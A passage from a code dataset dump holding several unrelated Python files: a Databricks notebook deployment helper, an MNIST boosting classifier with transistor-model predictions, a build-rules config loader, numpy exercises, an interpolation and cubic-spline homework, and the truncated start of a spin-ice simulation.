{current_head} already exists on the cluster, resuming without upload')\n elif r.status_code != 200:\n raise Exception(f'Error while uploading egg: {r.status_code}, {r.reason}, {r.text}')\n required_repos.append({\"egg\": full_install_path})\n assert (path_safety_word in copy_path)\n shutil.rmtree(copy_path, ignore_errors=False)\n return required_repos\n\n\ndef _parse_jar_requirement(deploy_url: str, requirements: List[Dict[str, str]]) -> List[Dict[str, str]]:\n required_jars: List[Dict[str, str]] = []\n url = f'{deploy_url}/dbfs/put'\n for jar in requirements:\n # convert_code_to_base64(jar['local_path'])\n payload = {\"path\": jar['target_path']}\n file = {'file': open(jar['local_path'], 'rb')}\n r = call_post(url, data=payload, files=file, exceptions_not_allowed=False)\n if r.status_code == 400 and r.json().get('error_code') == 'RESOURCE_ALREADY_EXISTS':\n print(f'Current jar {jar[\"local_path\"]} already exists on the cluster, resuming without upload')\n elif r.status_code != 200:\n raise Exception(f'Error while uploading egg: {r.status_code}, {r.reason}, {r.text}')\n required_jars.append({\"jar\": jar[\"target_path\"]})\n return required_jars\n\n\ndef _parse_maven_requirement(requirements: List[str]) -> List[Dict[str, Any]]:\n required_artifacts: List[Dict[str, Any]] = []\n for artifact in requirements:\n latest_required = artifact.split(':')[-1] == 'LATEST'\n artifact_coordinate = artifact\n if latest_required:\n latest_version = get_latest_maven_artifact(artifact)\n artifact_coordinate = artifact.replace('LATEST', latest_version)\n required_artifacts.append({'maven': {'coordinates': artifact_coordinate}})\n return required_artifacts\n\n\ndef create_requirements_install_info(deploy_url: str, requirements: Dict[str, Any]) -> List[Dict[str, Any]]:\n # See if all requirements are found from the cluster already\n required_setup: List[Dict[str, Any]] = []\n if 'maven' in requirements:\n required_setup.extend(_parse_maven_requirement(requirements['maven']))\n if 'pypi' in requirements:\n required_setup.extend([{'pypi': {'package': pkg}} for pkg in requirements['pypi']])\n\n # Upload local_jars and private_repos to cluster, use given upload path as path to install from\n if 'local_jars' in requirements:\n required_setup.extend(_parse_jar_requirement(deploy_url, requirements['local_jars']))\n if 'private_repositories' in requirements:\n required_setup.extend(_parse_private_repositories(deploy_url, requirements['private_repositories']))\n return required_setup\n\n\ndef deploy_notebook(env: str, deploy_url: str, config: Dict[str, Any]) -> None:\n config['cluster_id'] = inject_matching_cluster_id(deploy_url, env, config['CLUSTER'])\n if config.get('requirements'):\n requirements = create_requirements_install_info(deploy_url, config['requirements'])\n deploy_requirements_to_databricks(deploy_url, config['cluster_id'], requirements)\n config['absolute_job_path'], config['parsed_job_name'] = inject_job_path(env, config)\n config['encoded_code'] = convert_code_to_base64(config['JOB_TO_DEPLOY'])\n push_code_to_databricks(deploy_url, config)\n if config['SCHEDULE_ENABLED'].lower() == 'true':\n apply_job_scheduling(env, deploy_url, config)\n","sub_path":"azure/databricks_notebook.py","file_name":"databricks_notebook.py","file_ext":"py","file_size_in_byte":17095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"595375454","text":"from mnist import MNIST\nimport sklearn.metrics as metrics\nfrom pylab import *\nimport sklearn.preprocessing as 
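# Hedged distillation of the class balancing done in load_dataset() below:
# draw a fixed fraction of the preferred digit, fill the rest with other
# digits, then shuffle. Standalone helper with the same 40% split; the
# function name and defaults are illustrative, not part of the original file.
import random
import numpy as np

def balanced_indices(labels, positive_class, n_total, positive_frac=0.4, seed=5):
    random.seed(seed)
    n_pos = int(n_total * positive_frac)
    pos = random.sample(list(np.nonzero(labels == positive_class)[0]), n_pos)
    neg = random.sample(list(np.nonzero(labels != positive_class)[0]), n_total - n_pos)
    idx = pos + neg
    random.shuffle(idx)
    return idx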
pp\nimport numpy as np\nfrom labels_to_current import otft_classifier_real\nimport random\nimport cv2\nimport scipy.stats\nfrom labels_to_current import otft_classifier_real\nimport matplotlib.pyplot as plt\nfrom save_csv import results_to_csv\nfrom sklearn.ensemble import AdaBoostClassifier\n\nNUM_CLASSES = 10\nPREF_DIGIT = 9\nNUM_WEAK_CLASSIFIERS = 4\n\ndef load_dataset(N_new):\n # digit 7\n # random.seed(10)\n # digit 0\n # random.seed(3)\n # digit 4\n # random.seed(10)\n random.seed(5)\n mndata = MNIST('mnist_benchmark/')\n X_train, labels_train = map(np.array, mndata.load_training())\n N = 2000\n #-----\n N_pref = int(N*0.4)\n index_pref = list(np.nonzero(labels_train == PREF_DIGIT)[0])\n index_pref = random.sample(index_pref, N_pref)\n index_not_pref = list(np.nonzero(labels_train != PREF_DIGIT)[0])\n index_not_pref = random.sample(index_not_pref, N-N_pref)\n index = []\n index.extend(index_pref)\n index.extend(index_not_pref)\n random.shuffle(index)\n X_train = X_train[index]\n labels_train = labels_train[index]\n #------\n X_train = X_train[0:N]\n labels_train = labels_train[0:N]\n X_test, labels_test = map(np.array, mndata.load_testing())\n #------\n Ntest = 2000\n N_pref = int(Ntest * 0.4)\n index_pref = list(np.nonzero(labels_test == PREF_DIGIT)[0])\n index_pref = random.sample(index_pref, N_pref)\n index_not_pref = list(np.nonzero(labels_test != PREF_DIGIT)[0])\n index_not_pref = random.sample(index_not_pref, Ntest - N_pref)\n index = []\n index.extend(index_pref)\n index.extend(index_not_pref)\n random.shuffle(index)\n X_test = X_test[index]\n labels_test = labels_test[index]\n #------\n\n X_train = np.reshape(X_train, (N, 28, 28)).astype('float32')\n X_test = np.reshape(X_test, ( X_test.shape[0], 28, 28)).astype('float32')\n X_train_n = []\n X_test_n = []\n for img in X_train:\n X_train_n.append(cv2.resize(img, (N_new, N_new)))\n for img in X_test:\n X_test_n.append(cv2.resize(img, (N_new, N_new)))\n X_train_n = np.array(X_train_n)\n X_test_n = np.array(X_test_n)\n X_train_n = X_train_n/255.0\n X_test_n = X_test_n/255.0\n N2 = N_new*N_new\n X_train = np.reshape(X_train_n, (N, N2))\n X_test = np.reshape(X_test_n, (X_test.shape[0], N2))\n return (X_train, labels_train), (X_test, labels_test)\n\n\ndef weak_train(X_train, y_train, weighting, reg=0.9):\n ''' Build a model from X_train -> y_train '''\n x_vectors = X_train\n y_vectors = y_train\n\n a = np.dot(np.transpose(x_vectors), np.transpose(list(map(lambda el: np.multiply(weighting, el), x_vectors.T))))\n b = np.dot(np.transpose(x_vectors), np.multiply(weighting, list(y_vectors)))\n a += (reg*np.identity(x_vectors.shape[1]))\n\n return np.dot(np.linalg.inv(a), b)\n\n\n\ndef weak_train_otft_perceptron(X_train, y_train, weighting, cost_interval=1, decr_learning_rate=False,\n iterations=100, learning_rate_fn=None, stochastic=False,\n verbose=False, reg=0, eps=0.0000005):\n\n cost = []\n X_train = np.transpose(list(map(lambda el: np.multiply(weighting, el), X_train.T)))\n y_train = np.array(y_train)\n #w = np.zeros(X_train.shape[1])\n w = y_train[15]*X_train[15]\n if learning_rate_fn is None and decr_learning_rate:\n learning_rate_fn = lambda eps, t: eps / (t + 1)\n elif not decr_learning_rate:\n learning_rate_fn = lambda eps, t: eps\n for t in range(iterations):\n index = random.randint(0, X_train.shape[0] - 1)\n X_t = X_train[index] if stochastic else X_train\n #s_t = 4.98117692e-10*2.0e4*np.matmul(X_t, w)\n #s_t, XT_t, R = otft_classifier_real(w, X_t)\n s_t = np.matmul(X_t, w)\n y_t = y_train[index] if stochastic else y_train\n 
mult_ys_t = np.multiply(y_t, s_t)\n index_cost_t = np.nonzero(mult_ys_t < 0)\n XT_t = X_t\n if t % cost_interval == 0:\n s = s_t\n mult_ys = np.multiply(y_train, s)\n index_cost = np.nonzero(mult_ys < 0)\n train_cost = -np.sum(mult_ys[index_cost])\n reg_cost = reg * np.linalg.norm(w) ** 2\n loss = train_cost + reg_cost\n cost.append(loss)\n if verbose:\n print(\"Iteration {}, Cost {}\".format(t, loss))\n X_n = XT_t[index_cost_t]\n y_n = y_t[index_cost_t]\n #grad = 4.98117692e-10*2.0e4*np.dot(X_n.T, y_n)\n grad = np.dot(X_n.T, y_n)\n train_grad = -np.sum(grad)\n reg_grad = 2 * reg * w\n eps = learning_rate_fn(eps, t)\n w = w - eps * (train_grad + reg_grad)\n return w\n\ndef one_hot(labels_train):\n '''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} '''\n matrix = np.zeros((X_train.shape[0], NUM_CLASSES))\n i = 0;\n for label in labels_train:\n matrix[i][label] = 1\n i = i + 1;\n return matrix\n\ndef signarize(labels_train):\n return map(lambda el: 1.0 if el == PREF_DIGIT else -1.0,labels_train)\n\ndef dot_product(model, X):\n return np.dot(model, X)\n\ndef weak_predict(model, X,out):\n ''' From model and data points, output prediction vectors '''\n W = np.transpose(model)\n results = np.zeros(X.shape[0])\n i = 0\n #pred = np.matmul(X, W)\n #pred = 0.2 / 3 * np.matmul(X, W) + 0.8 / 3 * np.sum(X, axis=1) - 0.1 * np.sum(W)\n pred, _, _ = otft_classifier_real(W, X)\n for item in pred:\n if item > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n\n print(\"Max : \", np.max(pred), \"\\nMin:\", np.min(pred))\n\n return results\n\ndef strong_train(X_train, y_train,eps,NUMM):\n NUM_WEAK_CLASSIFIERS = NUMM\n #should return matrix of weight vectors and alphas\n alphas = np.zeros(NUM_WEAK_CLASSIFIERS)\n weights = np.zeros((NUM_WEAK_CLASSIFIERS, X_train.shape[1]))\n #the 0th is extra - discard before returning\n\n step_size = int(X_train.shape[0] / (NUM_WEAK_CLASSIFIERS + 1))\n step_size = X_train.shape[0]\n\n prev = X_train[0:step_size] # initial sub-dataset\n prev_y = y_train[0:step_size]\n\n i = 0\n\n while (i / step_size) < NUM_WEAK_CLASSIFIERS:\n ith = int(i / step_size)\n\n weighting = np.ones(step_size)\n for j in range(step_size):\n weighting[j] = 1.0 / (1.0 + np.exp(prev_y[j] * strong_eval(prev[j], weights, alphas, iters=(ith))))\n\n norm = np.linalg.norm(weighting)\n if norm != 0.0:\n weighting = weighting/norm\n\n #weighting = np.ones(step_size)\n weights[ith] = weak_train(prev, prev_y, weighting)\n #weights[ith] = weak_train_otft_perceptron(prev, prev_y, weighting = weighting, stochastic=False, verbose=True, eps=eps,iterations=70)\n\n #we increment here b/c from here on out we use a new slice of data\n i = i + step_size\n\n\n # prev = X_train[i : i + step_size]\n # prev_y = y_train[i : i + step_size]\n prev = X_train[0:step_size] # initial sub-dataset\n prev_y = y_train[0:step_size]\n\n epsilon = 0.0\n pred = np.zeros(step_size)\n for j in range(step_size):\n pred[j] = dot_product(weights[ith], prev[j])\n pred = np.sign(pred)\n for j in range(step_size):\n epsilon = epsilon + (pred[j] == 1.0)\n epsilon = epsilon / step_size\n\n alpha = 0.5 * np.log((1 - epsilon) / epsilon)\n alphas[ith] = alpha\n\n\n return weights, alphas\n\ndef strong_eval(x, weights, alphas, iters=NUM_WEAK_CLASSIFIERS):\n if(iters == 0):\n return 0.0\n result = 0.0\n for i in range(iters):\n result = result + alphas[i] * dot_product(weights[i], x)\n return result\n\ndef strong_eval_otft(x, weights, alphas, iters=NUM_WEAK_CLASSIFIERS, single=False):\n if(iters == 0):\n return 
0.0\n result = 0.0\n for i in range(iters):\n pred,_,_ = otft_classifier_real(weights[i], x, single)\n result = result + alphas[i] * pred\n return result\n\ndef strong_predict(X_train, weights, alphas, out=0, NUMM=NUM_WEAK_CLASSIFIERS):\n results = np.zeros(X_train.shape[0])\n i = 0\n\n for data in X_train:\n pred = strong_eval(data, weights, alphas, NUMM)\n if pred > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n\n return results\n\ndef strong_predict_otft(X_train, weights, alphas, out, NUMM=NUM_WEAK_CLASSIFIERS):\n results = np.zeros(X_train.shape[0])\n i = 0\n pred = strong_eval_otft(X_train, weights, alphas, iters=NUMM)\n for item in pred:\n if item > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n print(\"Max : \", np.max(pred), \"\\nMin:\", np.min(pred))\n return results\n\n\ndef AdaBoost_scratch(X, y, M=10, learning_rate=1, out=0):\n # Initialization of utility variables\n N = len(y)\n estimator_list, y_predict_list, estimator_error_list, estimator_weight_list, sample_weight_list = [], [], [], [], []\n\n # Initialize the sample weights\n sample_weight = np.ones(N) / N\n sample_weight_list.append(sample_weight.copy())\n\n # For m = 1 to M\n for m in range(M):\n # Fit a classifier\n model = weak_train_otft_perceptron(X, y, np.ones(X.shape[0]), verbose=False,\n eps=10 ** (-2.8), iterations=70)\n y_predict = weak_predict(model, X,out = out)\n\n # Misclassifications\n incorrect = (y_predict != y)\n\n # Estimator error\n estimator_error = np.mean(np.average(incorrect, weights=sample_weight, axis=0))\n\n # Boost estimator weights\n estimator_weight = learning_rate * np.log((1. - estimator_error) / estimator_error)\n\n # Boost sample weights\n sample_weight *= np.exp(estimator_weight * incorrect * ((sample_weight > 0) | (estimator_weight < 0)))\n\n # Save iteration values\n estimator_list.append(model)\n y_predict_list.append(y_predict.copy())\n estimator_error_list.append(estimator_error.copy())\n estimator_weight_list.append(estimator_weight.copy())\n sample_weight_list.append(sample_weight.copy())\n\n # Convert to np array for convenience\n estimator_list = np.asarray(estimator_list)\n y_predict_list = np.asarray(y_predict_list)\n estimator_error_list = np.asarray(estimator_error_list)\n estimator_weight_list = np.asarray(estimator_weight_list)\n sample_weight_list = np.asarray(sample_weight_list)\n\n # Predictions\n preds = (np.array([np.sign((y_predict_list[:, point] * estimator_weight_list).sum()+out) for point in range(N)]))\n print('Accuracy = ', (preds == y).sum() / N)\n accuracy = (preds == y).sum() / N\n\n return accuracy, estimator_list, estimator_weight_list, sample_weight_list\n\n\n# def AdaBoost_scratch(X, y, M=10, learning_rate=1, out=0):\n\n\nif __name__ == \"__main__\":\n N_new = 28\n (X_train, labels_train), (X_test, labels_test) = load_dataset(N_new)\n X_train = X_train*3+0.8\n X_test = X_test*3+0.8\n print(X_test.shape, labels_test)\n\n ones_X_train = np.ones((X_train.shape[0], 1))\n X_train = np.append(X_train, ones_X_train, axis=1)\n\n ones_X_test = np.ones((X_test.shape[0], 1))\n X_test = np.append(X_test, ones_X_test, axis=1)\n\n labels_train, labels_test = list(signarize(labels_train)), list(signarize(labels_test))\n\n #========== Weak boosted classifier ==========\n # accuracy_train = []\n # accuracy_test = []\n #\n # a = -0.04\n # b = 0.01\n # numm = 20\n # #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n # for i in linspace(a,b,numm):\n # model = weak_train_otft_perceptron(X_train, 
labels_train, np.ones(X_train.shape[0]), verbose=False,eps=10**(-7), iterations = 70)\n # #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n #\n #\n # weak_pred_labels_train = weak_predict(model, X_train,out=i)\n # weak_pred_labels_test = weak_predict(model, X_test,out=i)\n #\n #\n # print(\"\\nWeak train accuracy: {0}\".format(metrics.accuracy_score(labels_train, weak_pred_labels_train)))\n # print(\"Weak validation accuracy: {0}\".format(metrics.accuracy_score(labels_test, weak_pred_labels_test)))\n # accuracy_train.append(metrics.accuracy_score(labels_train, weak_pred_labels_train))\n # accuracy_test.append((metrics.accuracy_score(labels_test, weak_pred_labels_test)))\n\n # plt.plot(linspace(a,b,numm),accuracy_train,label='Training Data')\n # plt.plot(linspace(a,b,numm), accuracy_test,label='Test Data')\n # plt.xlabel('threshold voltage')\n # plt.title(\"Accuracy of the Weak Classifier vs. threshold voltage\")\n # plt.legend()\n # plt.show()\n #\n # plt.plot(model)\n # print(max(model),min(model))\n # plt.show()\n\n # #========== Strong boosted classifier ==========\n a = 1\n b = 6\n # a = -0.002\n # b = 0.008\n numm = 6\n accuracy_train = []\n accuracy_test = []\n #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n for i in linspace(a,b,numm):\n\n # #Strong vs Vth\n # weights, alphas = strong_train(X_train, labels_train, eps=10 ** (-7.2), NUMM=4)\n # strong_pred_labels_train = strong_predict_otft(X_train, weights, alphas, out=i, NUMM=4)\n # strong_pred_labels_test = strong_predict_otft(X_test, weights, alphas, out=i, NUMM=4)\n\n # Strong vs. num of weak classifiers\n weights, alphas = strong_train(X_train, labels_train,eps=10**(-7.2), NUMM=int(i))\n strong_pred_labels_train = strong_predict_otft(X_train, weights, alphas, out=0.006, NUMM=int(i))\n strong_pred_labels_test = strong_predict_otft(X_test, weights, alphas, out=0.006, NUMM=int(i))\n\n\n #model = AdaBoostClassifier(n_estimators=5, random_state=10)\n\n print(\"Strong train accuracy: {0}\".format(metrics.accuracy_score(labels_train, strong_pred_labels_train)))\n print(\"Strong validation accuracy: {0}\".format(metrics.accuracy_score(labels_test, strong_pred_labels_test)))\n\n\n accuracy_train.append(metrics.accuracy_score(labels_train, strong_pred_labels_train))\n accuracy_test.append((metrics.accuracy_score(labels_test, strong_pred_labels_test)))\n\n # accuracy,_,_,_ = AdaBoost_scratch(X_train, labels_train, M=10, learning_rate=1,out=i)\n # accuracy_train.append(accuracy)\n\n Vth = linspace(a,b,numm)\n results_to_csv(accuracy_train,'accuracy_train')\n results_to_csv(accuracy_test, 'accuracy_test')\n results_to_csv(Vth, 'Vth')\n plt.plot(Vth,accuracy_train, label='Training Data')\n plt.plot(Vth, accuracy_test, label='Test Data')\n plt.xlabel('Number of Weak Classifiers')\n #plt.xlabel('Vth(mV)')\n plt.title(\"Accuracy\")\n plt.legend()\n plt.show()","sub_path":"classifier_strong.py","file_name":"classifier_strong.py","file_ext":"py","file_size_in_byte":14802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"265482191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPackage that reads, parses and processes the configuration file\n\"\"\"\n\n## \\package makeprojects.config\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nfrom shutil import copyfile\nfrom burger import get_windows_host_type, import_py_script\n\n## build_rules.py file to detect 
secondly\nBUILD_RULES_PY = 'build_rules.py'\n\n## BUILD_RULES_PY location environment variable\n_BUILD_RULES_VAR = 'BUILD_RULES'\n\n## Location of the user's home directory\nUSER_HOME = os.path.expanduser('~')\n\nif 'MAKE_PROJECTS_HOME' in os.environ:\n ## Location of makeprojects home directory if redirected\n PROJECTS_HOME = os.environ['MAKE_PROJECTS_HOME']\nelse:\n PROJECTS_HOME = USER_HOME\n\n########################################\n\n\ndef save_default(working_directory=None, destinationfile=BUILD_RULES_PY):\n \"\"\"\n Calls the internal function to save a default .projectsrc file\n\n Given a pathname, create and write out a default .projectsrc file\n that can be used as input to makeprojects to generate project files.\n\n Args:\n working_directory: Directory to save the destination file\n destinationfile: Pathname of where to save the default configuation file\n \"\"\"\n\n # If the destination is not an absolute path...\n if not os.path.isabs(destinationfile):\n # Prepend the working directory\n if not working_directory:\n working_directory = os.getcwd()\n # Create the path to store the configuration file\n destinationfile = os.path.join(working_directory, destinationfile)\n\n # Get the source file path\n src = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY)\n\n # Copy the file\n try:\n copyfile(src, destinationfile)\n except OSError as error:\n print(error)\n\n########################################\n\n\ndef find_default_build_rules():\n \"\"\"\n Search for the build_rules.py file.\n\n Scan for the build_rules.py file starting from the current working directory\n and search downwards until the root directoy is it. If not found, search in\n the user's home directory or for linux/macOS, in /etc\n\n Returns:\n Pathname of the configuration file, or None if no file was found.\n \"\"\"\n\n # See if there's an environment variable pointing to a file\n while True:\n if _BUILD_RULES_VAR in os.environ and os.path.exists(\n os.environ[_BUILD_RULES_VAR]):\n result = os.environ[_BUILD_RULES_VAR]\n if os.path.isfile(result):\n break\n\n # Scan the usual suspects for a global instance\n\n # If '~' doesn't expand or /root, use the current folder\n if USER_HOME not in ('~', '/root'):\n # Check the user's home folder\n result = os.path.join(USER_HOME, BUILD_RULES_PY)\n if os.path.isfile(result):\n break\n\n result = os.path.join(USER_HOME, '.config', BUILD_RULES_PY)\n if os.path.isfile(result):\n break\n\n # If not found, use /etc/projectsrc for system globals on non\n # windows platforms\n if not get_windows_host_type():\n result = '/etc/' + BUILD_RULES_PY\n if os.path.isfile(result):\n break\n\n result = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY)\n break\n\n return result\n\n\n## Full pathname of the configuration file\nDEFAULT_BUILD_RULES = find_default_build_rules()\n\n########################################\n\n\ndef import_configuration(file_name=None, verbose=True):\n \"\"\"\n Load in the configuration file\n\n Using the file PROJECTSRC, load it in and parse it as an INI\n file using the configparser python class.\n\n Args:\n file_name: File to load for configuration\n verbose: If True, print the loaded file''s name.\n\n Returns:\n An empty parser object or filled with a successfully loaded file\n \"\"\"\n\n if file_name is None:\n file_name = DEFAULT_BUILD_RULES\n\n build_rules = None\n if file_name and os.path.exists(file_name):\n build_rules = import_py_script(file_name)\n if verbose:\n if build_rules:\n print('Using configuration file {}'.format(file_name))\n else:\n print('build_rules.py was corrupt.')\n else:\n if verbose:\n print('No configuration file found, using defaults')\n build_rules = import_py_script(\n os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY))\n return build_rules\n","sub_path":"makeprojects/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"580841699","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[148]:\n\n\nx=np.array([5,2,9,4])\ny=np.array([10,9,4,3])\nz=np.array([2.5,9.7,1.2,2.4])\nnum=np.array([-1.6,-2.9,-3.0,-8.9])\nangles=np.array([90,180,270,360])\nset=np.array([2,2,2,3,4,3,9,9,8,7,7])\n\n\n# In[22]:\n\n\nsqrt=np.sqrt(x)\npower=np.power(x,3)\nmean=np.mean(x)\nexp=np.exp(x)\nlog=np.log(x)\nlog2=np.log2(x)\nlog10=np.log10(x)\na=np.reciprocal(x)\nb=np.isreal(x)\nc=np.square(x)\n\n\n# In[26]:\n\n\nsqrt,power,mean,exp,log,log2,log10,a,b,c\n\n\n# In[27]:\n\n\nx,y,z\n\n\n# In[54]:\n\n\nabsolute=np.absolute(num)\nd=np.maximum(x,y)\nf=np.minimum(x,y)\n\n\n# In[55]:\n\n\nabsolute,d,f\n\n\n# In[108]:\n\n\nsinit=np.sin(angles)\nsinit\n\n\n# In[57]:\n\n\nnp.cos(angles)\n\n\n# In[58]:\n\n\nnp.tan(angles)\n\n\n# In[171]:\n\n\nsumit=np.sum(x)\nadd=np.add(x,y)\nmul=np.multiply(x,y)\ndivision=np.divide(x,y)\ndiff=np.subtract(x,y)\ntru=np.trunc(z)\nfixit=np.fix(num)\nroundnum=np.around(sinit,2)\nflornum=np.floor(sinit)\nceil=np.ceil(num)\nmodit=np.mod(x,y)\ndivnmod=np.divmod(x,y)\ncumsum=np.cumsum(x)\n\n\n# In[172]:\n\n\nsumit,add,mul,division,diff,tru,fixit,roundnum,flornum,ceil,modit,divnmod,cumsum\n\n\n# In[138]:\n\n\nnum1=20\nnum2=30\nlcm=np.lcm(num1,num2)\ngcd=np.gcd(num1,num2)\nlcm,gcd\n\n\n# In[136]:\n\n\nlcmit=np.lcm.reduce(x)\ngcdit=np.gcd.reduce(x)\n\n\n# In[137]:\n\n\nlcmit,gcdit\n\n\n# In[145]:\n\n\nd2r=np.deg2rad(angles)\nr2d=np.rad2deg(d2r)\n\n\n# In[146]:\n\n\nd2r,r2d\n\n\n# In[161]:\n\n\nu=np.unique(set)\nunion=np.union1d(set,u)\nintersection=np.intersect1d(set,x)\n\n\n# In[158]:\n\n\nu,union,intersection\n\n\n# In[176]:\n\n\ndif=np.diff(x)\ndiff=np.diff(x,n=2)\nwhere=np.where(u>5,\"ok\",\"nok\")\n\n\n# In[177]:\n\n\ndif,diff,where\n\n\n# In[183]:\n\n\nmatrix1=np.random.randn(2,3)\nmatrix2=np.random.randn(3,2)\n\n\n# In[184]:\n\n\nmatrix1,matrix2\n\n\n# In[192]:\n\n\ndot=matrix1.dot(matrix2)\ntp=matrix1.transpose()\nplus=matrix1+matrix1\nminus=matrix2-matrix2\n\n\n# In[195]:\n\n\ndot,tp,plus,minus,matrix1.trace()\n\n\n# In[197]:\n\n\nbase=2\nperp=3\nnp.hypot(base,perp)\n\n\n# In[198]:\n\n\nnp.arcsin(1)\n\n\n# In[199]:\n\n\nnp.arccos(1)\n\n\n# In[200]:\n\n\nnp.arctan(1)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"np-assign1.py","file_name":"np-assign1.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"18157907","text":"#Q18.28\nimport numpy as np\nprint(\"exact result is 7.986 \\n\")\n# linear interpolation\nprint(\"linear interpolation\")\nf1=8.418+((7.305-8.418)/(32-24))*(27-24) #線性內插的公式\nprint(f1)\n\n#牛頓內插\nprint(\"\\n牛頓內插\")\ny=np.array([11.843,9.870,8.418,7.305])\nx=np.array([8,16,24,32])\nyint=[]\nea=[]\nn=4\nfdd = np.zeros((n,n), dtype=np.float)\n\nfor i in range(0,n):\n fdd[i,0]=y[i] #將f(x)存入fdd\n#print(fdd)\nfor j in range(1,n):\n for i in range(0,n-j):\n fdd[i,j]=(fdd[i+1,j-1]-fdd[i,j-1])/(x[i+j]-x[i]) 
#計算係數,fdd[0,1]是f[x1,x0]依此類推\n#print(fdd)\nxterm=1\nyint.append(fdd[0,0])\nfor order in range(1,n):\n xterm=xterm*(27-x[order-1]) #計算(x-x0),(x-x0)(x-x1).....\n #print(x[order-1])\n yint2=yint[order-1]+fdd[0,order]*xterm #計算fn(x)\n ea.append(yint2-yint[order-1]) #算誤差\n yint.append(yint2) #將yint2存入yint\nprint(yint[n-1])\n\n\n#-----------------------------------------------------------------------------------\n#cubic spline\ny=np.array([11.843,9.870,8.418,7.305])\nc=np.array([8,16,24,32])\nx=np.array([[3.0],[3.0]])\nn=4\nb=np.zeros((n-2,1), dtype=np.float)\nh=np.zeros((n-2,n-2), dtype=np.float)\n\ns=[]\nh1=8\n\nh[0,0]=4*h1 #第一列的值[4h,h,0,0...]\nh[0,1]=h1\nfor i in range(1,n-2): #將除了第一列和最後一列的值存進矩陣(帶狀矩陣)\n for j in range(0,n-3):\n if i==j: #如果是對角線,就存入4h,對角線兩側存h\n h[i,j]=h1*4\n h[i,j+1]=h1\n h[i,j-1]=h1\nh[n-3,n-3]=4*h1 #最後一列的值\nh[n-3,n-4]=h1\n\nfor k in range(0,n-2): #計算課本公式18.37等候右邊的值,存進b矩陣\n b[k,0]=(6/(h1))*(y[k+2]-y[k+1])+(6/(h1))*(y[k]-y[k+1])\n\n#---------------高斯消去------------------\nn=n-2\ntol=0.05\ner=0\n\nfor i in range(0,n,1):\n s.append(abs(h[i,0])) #將h[i,0]加入s矩陣\n #print(s[i])\n for j in range(1,n):\n if abs(h[i,j])>s[i]: #如果同一列有數大於s[i](同一列第一個被加進去的數),較大的就取代之,直到s矩陣是每一列最大的數\n s[i]=(abs(h[i,j]))\n#eliminate\nfor k in range(0,n-1): #交換+前消\n#pivot\n p=k #p為列號\n big=abs(h[k,k]/s[k]) #pivot=對角線數/最大值\n for o in range(k+1,n): #從下一列開始比較(k+1列),找pivot最大的列\n dummy=abs(h[o,k]/s[o]) #假設dum=某列的值/某列最大值\n if dummy>big: #如果dum>big,即某列值/最大值>原列值/最大值\n big=dummy #pivot值改成dum\n p=o #p由k列改成o\n if p!=k: #如果p不等於k:\n for m in range(k,n):#把第一列和下面的列數比較,若p不等於k則每一列元素和原本的互換,\n d=h[p,m] #a矩陣的互換\n h[p,m]=h[k,m]\n h[k,m]=d\n c=b[p,0] #b矩陣互換\n b[p,0]=b[k,0]\n b[k,0]=c\n \n e=s[p] #s矩陣互換\n s[p]=s[k]\n s[k]=e\n\n if abs(h[k,k]/s[k])> Vertex matrix size= (Xcell-1)x(Ycell-1)\nM, N = 2*Xcell+1, 2*Ycell+1 ## Matrix size representing the ASI array for calculations and representations \nits = 300 # Total number of iterations\n#S, Sxy, Sx, Sy = ASI_Lattice(M,N,0) # ASI lattice generate function ASI_Lattice(Rows,Colums, Initial state {0:randomn, 1: DPS}) ; #Sxy[:,1,0] #[x=0 or y=1,row, column]\n\n#============Control switches==================================================\ndipolar_switch = 1\nexchange_switch = 0\nExchange_Bias = 0\ngraphs = 1\n\n#================ External parameters =========================================\n#T = 0.10 # System temperature\n#kb = 1 # 1.38064852e-23 # Boltman constant\n#b = 3 # inverse temperature 1/kT typical=1\nHa = 0.01 # Applied magnetic field Hc ~ 1.30\nphi_H = 0 # Applied magnetic field direction\nH = (Ha*math.cos(math.radians(phi_H)), Ha*math.sin(math.radians(phi_H))) # Applied magnetic field\nC = 1 #1e-7 # Dipolar interaction constant mu/4pi\n\n#============ASI intrinsic properties = Energy barrier distribution, Exchange bias==============================\nGaussian_distribution = np.random.normal(.70, 0.001, size=(M*N,))\nswitching_Barrier = np.reshape(Gaussian_distribution, (M, N))\nEbxy = np.multiply(switching_Barrier,abs(Sx+Sy))\nExy = np.zeros((M,N))\nEd, Ez, Ex, Eeb = np.zeros((M,N)), np.zeros((M,N)), np.zeros((M,N)), np.zeros((M,N))\n\nif (Exchange_Bias == 0):\n h_eb = 1.0 # Exchange bias magnitude\n dh_eb = 0.010 # Standard deviation\n phi_Heb = 180 # Angle in degrees\n dphi_Heb = 2 # Standard deviation in direction of exchange bias\n Exchange_Barrier = np.reshape(np.random.normal(h_eb,dh_eb, size=(M*N,)), (M, N))\n h_eb_arr = np.multiply(Exchange_Barrier,abs(Sx+Sy))\n Exchange_angle_arr = np.reshape(np.random.normal(math.radians(phi_Heb), math.radians(dphi_Heb), size=(M*N,)), (M, 
